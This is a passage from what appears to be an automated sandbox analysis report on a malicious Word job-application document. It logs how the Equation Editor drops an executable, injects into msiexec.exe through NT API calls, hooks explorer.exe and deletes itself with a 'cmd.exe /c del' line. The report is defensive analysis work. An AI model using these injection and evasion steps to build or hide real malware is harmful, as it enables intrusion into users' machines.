          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025A579A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0252C7BC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02555485
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02531489
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0252351F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0253C5F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025D3A83
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02547B00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025ADBDA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0251FBD7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025CCBA4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0252C85C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0254286D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025BF8EE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025A5955
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025369FE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025C098E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025229B2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0253EE4C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02552E2F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0254DF7C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02530F3F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0252CD5B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02550D3B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025BFDDD
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0012E5B3
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0012D5A6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_00112D90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0012DE46
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_00119E60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_00112FB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0012DFA2
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: String function: 009B3F92 appears 105 times
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: String function: 009B373B appears 238 times
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: String function: 0096DF5C appears 104 times
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: String function: 0096E2A8 appears 38 times
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: String function: 009DF970 appears 81 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0258F970 appears 81 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0251DF5C appears 106 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0256373B appears 238 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 02563F92 appears 108 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0251E2A8 appears 38 times
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041A360 NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041A410 NtReadFile,
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041A490 NtClose,
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041A540 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041A35A NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041A40A NtReadFile,
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041A48A NtClose,
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009600C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00960048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00960078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009610D0 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00960060 NtQuerySection,
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009601D4 NtSetValueKey,
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0096010C NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00961148 NtOpenThread,
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009607AC NtCreateMutant,
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095F8CC NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00961930 NtSetContextThread,
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095F938 NtWriteFile,
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FAB8 NtQueryValueKey,
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FA20 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FA50 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FBE8 NtQueryVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FB50 NtCreateKey,
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FC30 NtOpenProcess,
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00960C40 NtGetContextThread,
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FC48 NtSetInformationFile,
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00961D80 NtSuspendThread,
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FD5C NtEnumerateKey,
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FE24 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FFFC NtCreateProcessEx,
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FF34 NtQueueApcThread,
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0029A036 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0029A042 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025100C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025107AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02510048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02510078 NtResumeThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02510060 NtQuerySection,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025110D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02511148 NtOpenThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0251010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025101D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FAD0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FAB8 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02511930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02510C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02511D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0012A360 NtCreateFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0012A410 NtReadFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0012A490 NtClose,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0012A35A NtCreateFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0012A40A NtReadFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0012A48A NtClose,
          Source: ~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: ~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmp.0.drOLE indicator has summary info: false
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeMemory allocated: 76E90000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeMemory allocated: 76E90000 page execute and read and write
          Source: seasonzx[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: seasonhd72463.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C.V_Job Request.docVirustotal: Detection: 50%
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\seasonhd72463.exe C:\Users\user\AppData\Roaming\seasonhd72463.exe
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess created: C:\Users\user\AppData\Roaming\seasonhd72463.exe C:\Users\user\AppData\Roaming\seasonhd72463.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\seasonhd72463.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\seasonhd72463.exe C:\Users\user\AppData\Roaming\seasonhd72463.exe
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess created: C:\Users\user\AppData\Roaming\seasonhd72463.exe C:\Users\user\AppData\Roaming\seasonhd72463.exe
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\seasonhd72463.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$V_Job Request.docJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDECA.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@9/10@2/1
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: seasonhd72463.exe, 00000004.00000000.412075091.0000000001102000.00000020.00020000.sdmp, seasonhd72463.exe, 00000005.00000000.420081661.0000000001102000.00000020.00020000.sdmpBinary or memory string: insert into mediaitem (name, type, checked_to_patron_id, checkout_date, due_date) values (@name, @type, @patron_id, @co_date, @due_date);
          Source: seasonhd72463.exe, 00000004.00000000.412075091.0000000001102000.00000020.00020000.sdmp, seasonhd72463.exe, 00000005.00000000.420081661.0000000001102000.00000020.00020000.sdmpBinary or memory string: select id, name, type, checked_to_patron_id, checkout_date, due_date from mediaitem {0} order by name;where checked_to_patron_id = Mwhere checked_to_patron_id is not nullaselect id, name, type from patron where id = {0}_select id, name, type from patron order by nameWThe method or operation is not implemented.9Library.Properties.Resources
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C.V_Job Request.docJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
          Source: explorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
          Source: ~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmp.0.drOLE document summary: title field not present or empty
          Source: ~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmp.0.drOLE document summary: author field not present or empty
          Source: ~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmp.0.drOLE document summary: edited time not present or 0
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: msiexec.pdb source: seasonhd72463.exe, 00000005.00000002.461806357.0000000000380000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdb source: seasonhd72463.exe, msiexec.exe
          Source: ~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmp.0.drInitial sample: OLE indicators vbamacros = False

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: seasonzx[1].exe.2.dr, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: seasonhd72463.exe.2.dr, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.2.seasonhd72463.exe.1100000.2.unpack, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.seasonhd72463.exe.1100000.0.unpack, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.seasonhd72463.exe.1100000.6.unpack, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.seasonhd72463.exe.1100000.1.unpack, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.seasonhd72463.exe.1100000.0.unpack, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.seasonhd72463.exe.1100000.10.unpack, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.2.seasonhd72463.exe.1100000.5.unpack, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.seasonhd72463.exe.1100000.4.unpack, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.seasonhd72463.exe.1100000.2.unpack, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.seasonhd72463.exe.1100000.8.unpack, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.seasonhd72463.exe.1100000.3.unpack, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00417162 push ebp; ret
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041D4B5 push eax; ret
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041D56C push eax; ret
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041D502 push eax; ret
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041D50B push eax; ret
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_004165E8 push es; retf
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041CE35 push edi; ret
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_004176DE push ebp; iretd
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041768B push ebp; iretd
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0096DFA1 push ecx; ret
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0029E9B5 push esp; retn 0000h
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0029EB02 push esp; retn 0000h
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0029EB1E push esp; retn 0000h
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0251DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_00127162 push ebp; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0012E3EF push esp; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0012D4B5 push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0012D502 push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0012D50B push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0012D56C push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_001265E8 push es; retf
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0012768B push ebp; iretd
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_001276DE push ebp; iretd
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0012CE35 push edi; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.54284746889
          Source: initial sampleStatic PE information: section name: .text entropy: 7.54284746889
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\seasonhd72463.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\seasonzx[1].exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xEB
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
